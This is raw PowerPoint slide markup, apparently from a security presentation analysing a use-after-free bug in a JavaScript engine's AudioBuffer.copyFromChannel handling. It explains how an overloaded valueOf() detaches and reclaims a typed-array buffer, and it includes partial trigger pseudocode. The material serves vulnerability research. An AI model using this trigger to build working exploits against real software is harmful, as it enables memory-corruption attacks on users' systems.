              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VarToInt</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="图片 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CCB2451-25AB-43A9-8CEA-2B7E3D349751}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7294131" y="3055404"/>
            <a:ext cx="4765248" cy="1265348"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="矩形 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED9A3ECB-CAAA-4B64-B634-2C9C14889A49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9279735" y="3694569"/>
            <a:ext cx="1940715" cy="23385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36" name="矩形 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{417C86CD-F3E9-4B48-8341-A195DCB6C81F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9279735" y="3932694"/>
            <a:ext cx="1940715" cy="23385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37" name="矩形 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86104AE9-C20A-49A3-8CBA-E484CDDB8A50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4172230" y="3543299"/>
            <a:ext cx="514070" cy="24824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38" name="矩形 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DEABE3B-98FD-4C4B-A572-FBD17FA3D97E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5391430" y="4067875"/>
            <a:ext cx="514070" cy="24824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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="连接符: 肘形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E8E8862-A097-4200-AA4E-0091EF42E10A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="35" idx="1"/>
            <a:endCxn id="37" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4686301" y="3667421"/>
            <a:ext cx="4593435" cy="144074"/>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1" name="连接符: 肘形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB1B2CAE-DE05-4D89-A49B-404671F2D7EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="36" idx="1"/>
            <a:endCxn id="38" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="5905501" y="4049619"/>
            <a:ext cx="3374235" cy="142377"/>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1" name="矩形 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8867790F-0B53-47A8-895A-90AF8925330D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727888" y="8872151"/>
            <a:ext cx="10860005" cy="1112997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="383301"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The function </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JsStaticAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DataConversion</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VarToInt</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> will process the last two input parameters of </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>audioBuf.copyFromChannel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(t2, obj, 0). When the parameter is an object, it will try to convert to an integer. If it is already an integer, it will return</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="图片 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{010ED81F-0B8E-4D55-8597-A255BDF2C3DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1061851" y="7356332"/>
            <a:ext cx="6246179" cy="386732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="49" name="连接符: 肘形 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4C28A03-E52A-4B46-8B32-53E88FEE8A2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="35" idx="3"/>
            <a:endCxn id="47" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4659067" y="3811495"/>
            <a:ext cx="6561383" cy="3823244"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -3484"/>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7" name="矩形 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3302C874-D1C6-4E8B-B364-CF2B9D62CFC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="7524250"/>
            <a:ext cx="3580942" cy="22097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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3659768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 Vulnerability Analysis</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6FE69EA-3BF7-45EE-9300-381C9FAF3E1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078124" y="2550693"/>
            <a:ext cx="10953455" cy="6370975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trigger UAF vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The function WTF::</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSOwnedTypedArray</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;1,float&gt;::</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSOwnedTypedArray</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;1,float&gt; will be called first, which will cache the data structure of the buffer of the Float32Array on its own stack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We can overload the </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>valueOf</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>() method of either of the last two parameters in </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>audioBuf.copyFromChannel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(t2, obj, 0). When passing in a dynamic object “obj”, the function </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JsStaticAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DataConversion</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VarToInt</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> will attempt to convert to an integer and call the overloaded </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>valueOf</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>() method.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>When executing the overloaded callback function </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>valueOf</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dettach</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> the buffer of the Float32Array, and then uses other data structures to occupy the position. After executing </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>copyFromChannel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, the data in the channel specified by </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AudioBuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> will be copied to the occupied data structure, resulting in the program crash.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="874440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 Vulnerability Analysis</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6FE69EA-3BF7-45EE-9300-381C9FAF3E1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078124" y="2550693"/>
            <a:ext cx="10953455" cy="7848302"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="2">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Pseudocode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>var t2 = new Float32Array(0x20000); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ta = new Uint8Array(t2.buffer);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>for (</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=0;i&lt;t2.length;i++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>t2[</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>] = 0x66;	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>………</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>var t</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>audioBuf</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.getChannelData</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(0);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>var ta2 = new Uint8Array(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>t.buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>for (</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=0;i&lt;ta2.length;i++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ta2[</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
